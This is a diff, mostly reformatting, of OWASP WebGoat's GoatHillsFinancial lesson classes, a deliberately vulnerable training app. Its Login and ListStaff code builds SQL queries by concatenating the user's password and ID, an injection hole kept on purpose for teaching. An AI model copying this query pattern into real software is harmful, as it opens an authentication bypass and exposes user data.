-		//System.out.println("GoatHillsFinancial.handleRequest() dispatching to: " + action.getActionName());
-		if (action.requiresAuthentication())
+		} catch (ValidationException ve)
 		{
-		    if (action.isAuthenticated(s))
-		    {
-			action.handleRequest(s);
-		    }
-		    else
-			throw new UnauthenticatedException();
-		}
-		else
+			System.out.println("Validation failed");
+			ve.printStackTrace();
+			setCurrentAction(s, ERROR_ACTION);
+		} catch (UnauthenticatedException ue)
 		{
-		    // Access to Login does not require authentication.
-		    action.handleRequest(s);
+			s.setMessage("Login failed");
+			System.out.println("Authentication failure");
+			ue.printStackTrace();
+		} catch (UnauthorizedException ue2)
+		{
+			s.setMessage("You are not authorized to perform this function");
+			System.out.println("Authorization failure");
+			setCurrentAction(s, ERROR_ACTION);
+			ue2.printStackTrace();
+		} catch (Exception e)
+		{
+			// All other errors send the user to the generic error page
+			System.out.println("handleRequest() error");
+			e.printStackTrace();
+			setCurrentAction(s, ERROR_ACTION);
 		}
-	    }
+
+		// All this does for this lesson is ensure that a non-null content exists.
+		setContent(new ElementContainer());
 	}
-	catch (ParameterNotFoundException pnfe)
+
+	public boolean isAuthorized(WebSession s, int userId, String functionId)
 	{
-	    System.out.println("Missing parameter");
-	    pnfe.printStackTrace();
-	    setCurrentAction(s, ERROR_ACTION);
+		// System.out.println("Checking authorization from " + getCurrentAction(s));
+		LessonAction action = getAction(getCurrentAction(s));
+		return action.isAuthorized(s, userId, functionId);
 	}
-	catch (ValidationException ve)
+
+	public int getUserId(WebSession s) throws ParameterNotFoundException
 	{
-	    System.out.println("Validation failed");
-	    ve.printStackTrace();
-	    setCurrentAction(s, ERROR_ACTION);
+		LessonAction action = getAction(getCurrentAction(s));
+		return action.getUserId(s);
 	}
-	catch (UnauthenticatedException ue)
+
+	public String getUserName(WebSession s) throws ParameterNotFoundException
 	{
-	    s.setMessage("Login failed");
-	    System.out.println("Authentication failure");
-	    ue.printStackTrace();
+		LessonAction action = getAction(getCurrentAction(s));
+		return action.getUserName(s);
 	}
-	catch (UnauthorizedException ue2)
+
+	protected String getJspPath()
 	{
-	    s.setMessage("You are not authorized to perform this function");
-	    System.out.println("Authorization failure");
-	    setCurrentAction(s, ERROR_ACTION);
-	    ue2.printStackTrace();
+		return "/lessons/" + getLessonName() + "/";
 	}
-	catch (Exception e)
+
+	public String getTemplatePage(WebSession s)
 	{
-	    // All other errors send the user to the generic error page
-	    System.out.println("handleRequest() error");
-	    e.printStackTrace();
-	    setCurrentAction(s, ERROR_ACTION);
+		return getJspPath() + getLessonName() + ".jsp";
 	}
 
-	// All this does for this lesson is ensure that a non-null content exists.
-	setContent(new ElementContainer());
-    }
+	public String getPage(WebSession s)
+	{
+		String page = getJspPath() + getCurrentAction(s) + ".jsp";
 
-    public boolean isAuthorized(WebSession s, int userId, String functionId)
-    {
-	//System.out.println("Checking authorization from " + getCurrentAction(s));
-	LessonAction action = getAction(getCurrentAction(s));
-	return action.isAuthorized(s, userId, functionId);
-    }
+		return page;
+	}
 
-    public int getUserId(WebSession s) throws ParameterNotFoundException
-    {
-	LessonAction action = getAction(getCurrentAction(s));
-	return action.getUserId(s);
-    }
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    public String getUserName(WebSession s) throws ParameterNotFoundException
-    {
-	LessonAction action = getAction(getCurrentAction(s));
-	return action.getUserName(s);
-    }
+	public String getTitle()
+	{
+		return "Goat Hills Financials";
+	}
 
-    protected String getJspPath() {
-    	return "/lessons/" + getLessonName() + "/";
-    }
-    
-    public String getTemplatePage(WebSession s)
-    {
-	return getJspPath() + getLessonName() + ".jsp";
-    }
+	public String getSourceFileName()
+	{
+		// FIXME: Need to generalize findSourceResource() and use it on the currently active
+		// LessonAction delegate to get its source file.
+		// return findSourceResource(getCurrentLessonScreen()....);
+		return super.getSourceFileName();
+	}
 
-    public String getPage(WebSession s)
-    {
-	String page = getJspPath() + getCurrentAction(s) + ".jsp";
-
-	return page;
-    }
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-    public String getTitle()
-    {
-	return "Goat Hills Financials";
-    }
-
-    public String getSourceFileName()
-    {
-	// FIXME: Need to generalize findSourceResource() and use it on the currently active 
-	// LessonAction delegate to get its source file.
-	//return findSourceResource(getCurrentLessonScreen()....);
-	return super.getSourceFileName();
-    }
-    
-    @Override
-	protected boolean getDefaultHidden() {
+	@Override
+	protected boolean getDefaultHidden()
+	{
 		return getClass().equals(GoatHillsFinancial.class);
 	}
 
 	public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
 
 	@Override
-	protected String getLessonName() {
+	protected String getLessonName()
+	{
 		String className = getClass().getName();
 		int index = className.lastIndexOf('.');
-		if (index > -1)
-			return className.substring(index+1);
+		if (index > -1) return className.substring(index + 1);
 		return super.getLessonName();
 	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java
index 8bcf4baa8..257abe1dd 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 
 import org.owasp.webgoat.session.ParameterNotFoundException;
@@ -6,22 +7,23 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
+
 public interface LessonAction
 {
-	public void handleRequest(WebSession s)
-			throws ParameterNotFoundException, UnauthenticatedException, UnauthorizedException, ValidationException;
-	
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException, ValidationException;
+
 	public String getNextPage(WebSession s);
-	
+
 	public String getActionName();
 
 	public boolean requiresAuthentication();
-	
+
 	public boolean isAuthenticated(WebSession s);
-	
+
 	public boolean isAuthorized(WebSession s, int employeeId, String functionId);
-	
+
 	public int getUserId(WebSession s) throws ParameterNotFoundException;
-	
+
 	public String getUserName(WebSession s) throws ParameterNotFoundException;
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java
index efee3ef10..7972b2700 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 
 import java.sql.ResultSet;
@@ -5,117 +6,107 @@ import java.sql.SQLException;
 import java.sql.Statement;
 import java.util.List;
 import java.util.Vector;
-
 import org.owasp.webgoat.session.EmployeeStub;
 import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.UnauthenticatedException;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class ListStaff extends DefaultLessonAction
 {
 
-    public ListStaff(GoatHillsFinancial lesson, String lessonName, String actionName)
-    {
-	super(lesson, lessonName, actionName);
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException
-    {
-	getLesson().setCurrentAction(s, getActionName());
-
-	if (isAuthenticated(s))
+	public ListStaff(GoatHillsFinancial lesson, String lessonName, String actionName)
 	{
-	    int userId = getIntSessionAttribute(s, getLessonName() + "."
-		    + GoatHillsFinancial.USER_ID);
-
-	    List<EmployeeStub> employees = getAllEmployees(s, userId);
-	    setSessionAttribute(s, getLessonName() + "."
-		    + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees);
+		super(lesson, lessonName, actionName);
 	}
-	else
-	    throw new UnauthenticatedException();
-    }
 
-    public String getNextPage(WebSession s)
-    {
-	return GoatHillsFinancial.LISTSTAFF_ACTION;
-    }
-
-    public List<EmployeeStub> getAllEmployees(WebSession s, int userId)
-	    throws UnauthorizedException
-    {
-	// Query the database for all employees "owned" by the given employee
-
-	List<EmployeeStub> employees = new Vector<EmployeeStub>();
-
-	try
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException
 	{
-	    String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in "
-		    + "(SELECT employee_id FROM ownership WHERE employer_id = "
-		    + userId + ")";
+		getLesson().setCurrentAction(s, getActionName());
 
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		answer_results.beforeFirst();
-		while (answer_results.next())
+		if (isAuthenticated(s))
 		{
-		    int employeeId = answer_results.getInt("userid");
-		    String firstName = answer_results.getString("first_name");
-		    String lastName = answer_results.getString("last_name");
-		    String role = answer_results.getString("role");
-		    //System.out.println("Retrieving employee stub for role " + role);
-		    EmployeeStub stub = new EmployeeStub(employeeId, firstName,
-			    lastName, role);
-		    employees.add(stub);
+			int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
+
+			List<EmployeeStub> employees = getAllEmployees(s, userId);
+			setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees);
 		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employees");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employees");
-	    e.printStackTrace();
+		else
+			throw new UnauthenticatedException();
 	}
 
-	return employees;
-    }
+	public String getNextPage(WebSession s)
+	{
+		return GoatHillsFinancial.LISTSTAFF_ACTION;
+	}
+
+	public List<EmployeeStub> getAllEmployees(WebSession s, int userId) throws UnauthorizedException
+	{
+		// Query the database for all employees "owned" by the given employee
+
+		List<EmployeeStub> employees = new Vector<EmployeeStub>();
+
+		try
+		{
+			String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in "
+					+ "(SELECT employee_id FROM ownership WHERE employer_id = " + userId + ")";
+
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				answer_results.beforeFirst();
+				while (answer_results.next())
+				{
+					int employeeId = answer_results.getInt("userid");
+					String firstName = answer_results.getString("first_name");
+					String lastName = answer_results.getString("last_name");
+					String role = answer_results.getString("role");
+					// System.out.println("Retrieving employee stub for role " + role);
+					EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role);
+					employees.add(stub);
+				}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employees");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employees");
+			e.printStackTrace();
+		}
+
+		return employees;
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java
index d2ef4508d..96834fb08 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 
 import java.sql.ResultSet;
@@ -5,7 +6,6 @@ import java.sql.SQLException;
 import java.sql.Statement;
 import java.util.List;
 import java.util.Vector;
-
 import org.owasp.webgoat.session.EmployeeStub;
 import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.UnauthenticatedException;
@@ -13,207 +13,179 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class Login extends DefaultLessonAction
 {
 
-    private LessonAction chainedAction;
+	private LessonAction chainedAction;
 
-
-    public Login(GoatHillsFinancial lesson, String lessonName, String actionName,
-	    LessonAction chainedAction)
-    {
-	super(lesson, lessonName, actionName);
-	this.chainedAction = chainedAction;
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    ValidationException
-    {
-	//System.out.println("Login.handleRequest()");
-	getLesson().setCurrentAction(s, getActionName());
-
-	List employees = getAllEmployees(s);
-	setSessionAttribute(s, getLessonName() + "."
-		+ GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees);
-
-	int employeeId = -1;
-	try
+	public Login(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
 	{
-	    employeeId = s.getParser().getIntParameter(
-		    GoatHillsFinancial.EMPLOYEE_ID);
-	    String password = s.getParser().getStringParameter(
-		    GoatHillsFinancial.PASSWORD);
+		super(lesson, lessonName, actionName);
+		this.chainedAction = chainedAction;
+	}
 
-	    // Attempt authentication
-	    if (login(s, employeeId, password))
-	    {
-		// Execute the chained Action if authentication succeeded.
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException
+	{
+		// System.out.println("Login.handleRequest()");
+		getLesson().setCurrentAction(s, getActionName());
+
+		List employees = getAllEmployees(s);
+		setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees);
+
+		int employeeId = -1;
 		try
 		{
-		    chainedAction.handleRequest(s);
-		}
-		catch (UnauthenticatedException ue1)
+			employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
+			String password = s.getParser().getStringParameter(GoatHillsFinancial.PASSWORD);
+
+			// Attempt authentication
+			if (login(s, employeeId, password))
+			{
+				// Execute the chained Action if authentication succeeded.
+				try
+				{
+					chainedAction.handleRequest(s);
+				} catch (UnauthenticatedException ue1)
+				{
+					System.out.println("Internal server error");
+					ue1.printStackTrace();
+				} catch (UnauthorizedException ue2)
+				{
+					System.out.println("Internal server error");
+					ue2.printStackTrace();
+				}
+			}
+			else
+				s.setMessage("Login failed");
+		} catch (ParameterNotFoundException pnfe)
 		{
-		    System.out.println("Internal server error");
-		    ue1.printStackTrace();
+			// No credentials offered, so we log them out
+			setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE);
 		}
-		catch (UnauthorizedException ue2)
+	}
+
+	/**
+	 * After this.handleRequest() is called, when the View asks for the current JSP to load, it will
+	 * get one initialized by this call.
+	 */
+	public String getNextPage(WebSession s)
+	{
+		String nextPage = GoatHillsFinancial.LOGIN_ACTION;
+
+		if (isAuthenticated(s)) nextPage = chainedAction.getNextPage(s);
+
+		return nextPage;
+
+	}
+
+	public boolean requiresAuthentication()
+	{
+		return false;
+	}
+
+	public boolean login(WebSession s, int userId, String password)
+	{
+		// System.out.println("Logging in to lesson");
+		boolean authenticated = false;
+
+		try
 		{
-		    System.out.println("Internal server error");
-		    ue2.printStackTrace();
-		}
-	    }
-	    else
-		s.setMessage("Login failed");
-	}
-	catch (ParameterNotFoundException pnfe)
-	{
-	    // No credentials offered, so we log them out
-	    setSessionAttribute(s, getLessonName() + ".isAuthenticated",
-		    Boolean.FALSE);
-	}
-    }
+			String query = "SELECT * FROM employee WHERE userid = " + userId + " and password = '" + password + "'";
 
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				if (answer_results.first())
+				{
+					setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.TRUE);
+					setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID, Integer.toString(userId));
+					authenticated = true;
+				}
 
-    /**
-     * After this.handleRequest() is called, when the View asks for the current JSP to load,
-     * it will get one initialized by this call.
-     */
-    public String getNextPage(WebSession s)
-    {
-	String nextPage = GoatHillsFinancial.LOGIN_ACTION;
-
-	if (isAuthenticated(s))
-	    nextPage = chainedAction.getNextPage(s);
-
-	return nextPage;
-
-    }
-
-
-    public boolean requiresAuthentication()
-    {
-	return false;
-    }
-
-
-    public boolean login(WebSession s, int userId, String password)
-    {
-	//System.out.println("Logging in to lesson");
-	boolean authenticated = false;
-
-	try
-	{
-	    String query = "SELECT * FROM employee WHERE userid = " + userId
-		    + " and password = '" + password + "'";
-
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		if (answer_results.first())
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error logging in");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
 		{
-		    setSessionAttribute(s,
-			    getLessonName() + ".isAuthenticated", Boolean.TRUE);
-		    setSessionAttribute(s, getLessonName() + "."
-			    + GoatHillsFinancial.USER_ID, Integer
-			    .toString(userId));
-		    authenticated = true;
+			s.setMessage("Error logging in");
+			e.printStackTrace();
 		}
 
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error logging in");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error logging in");
-	    e.printStackTrace();
+		// System.out.println("Lesson login result: " + authenticated);
+		return authenticated;
 	}
 
-	//System.out.println("Lesson login result: " + authenticated);
-	return authenticated;
-    }
-
-
-    public List<EmployeeStub> getAllEmployees(WebSession s)
-    {
-	List<EmployeeStub> employees = new Vector<EmployeeStub>();
-
-	// Query the database for all roles the given employee belongs to
-	// Query the database for all employees "owned" by these roles
-
-	try
+	public List<EmployeeStub> getAllEmployees(WebSession s)
 	{
-	    String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles "
-		    + "where employee.userid=roles.userid";
+		List<EmployeeStub> employees = new Vector<EmployeeStub>();
 
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		answer_results.beforeFirst();
-		while (answer_results.next())
+		// Query the database for all roles the given employee belongs to
+		// Query the database for all employees "owned" by these roles
+
+		try
 		{
-		    int employeeId = answer_results.getInt("userid");
-		    String firstName = answer_results.getString("first_name");
-		    String lastName = answer_results.getString("last_name");
-		    String role = answer_results.getString("role");
-		    EmployeeStub stub = new EmployeeStub(employeeId, firstName,
-			    lastName, role);
-		    employees.add(stub);
-		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employees");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employees");
-	    e.printStackTrace();
-	}
+			String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles "
+					+ "where employee.userid=roles.userid";
 
-	return employees;
-    }
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				answer_results.beforeFirst();
+				while (answer_results.next())
+				{
+					int employeeId = answer_results.getInt("userid");
+					String firstName = answer_results.getString("first_name");
+					String lastName = answer_results.getString("last_name");
+					String role = answer_results.getString("role");
+					EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role);
+					employees.add(stub);
+				}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employees");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employees");
+			e.printStackTrace();
+		}
+
+		return employees;
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java
index c02c3cef6..3e155d5fa 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 
 import org.owasp.webgoat.session.ParameterNotFoundException;
@@ -6,79 +7,70 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class Logout extends DefaultLessonAction
 {
 
-    private LessonAction chainedAction;
+	private LessonAction chainedAction;
 
-
-    public Logout(GoatHillsFinancial lesson, String lessonName, String actionName,
-	    LessonAction chainedAction)
-    {
-	super(lesson, lessonName, actionName);
-	this.chainedAction = chainedAction;
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    ValidationException
-    {
-	//System.out.println("Logging out");
-
-	setSessionAttribute(s, getLessonName() + ".isAuthenticated",
-		Boolean.FALSE);
-
-	// FIXME: Maybe we should forward to Login.
-	try
+	public Logout(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
 	{
-	    chainedAction.handleRequest(s);
-	}
-	catch (UnauthenticatedException ue1)
-	{
-	    System.out.println("Internal server error");
-	    ue1.printStackTrace();
-	}
-	catch (UnauthorizedException ue2)
-	{
-	    System.out.println("Internal server error");
-	    ue2.printStackTrace();
+		super(lesson, lessonName, actionName);
+		this.chainedAction = chainedAction;
 	}
 
-    }
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException
+	{
+		// System.out.println("Logging out");
 
+		setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE);
 
-    public String getNextPage(WebSession s)
-    {
-	return chainedAction.getNextPage(s);
-    }
+		// FIXME: Maybe we should forward to Login.
+		try
+		{
+			chainedAction.handleRequest(s);
+		} catch (UnauthenticatedException ue1)
+		{
+			System.out.println("Internal server error");
+			ue1.printStackTrace();
+		} catch (UnauthorizedException ue2)
+		{
+			System.out.println("Internal server error");
+			ue2.printStackTrace();
+		}
+
+	}
+
+	public String getNextPage(WebSession s)
+	{
+		return chainedAction.getNextPage(s);
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java
index 7113b4c76..7e3001566 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java
@@ -1,49 +1,47 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class SearchStaff extends DefaultLessonAction
 {
 
-    public SearchStaff(GoatHillsFinancial lesson, String lessonName,
-	    String actionName)
-    {
-	super(lesson, lessonName, actionName);
-    }
+	public SearchStaff(GoatHillsFinancial lesson, String lessonName, String actionName)
+	{
+		super(lesson, lessonName, actionName);
+	}
 
-
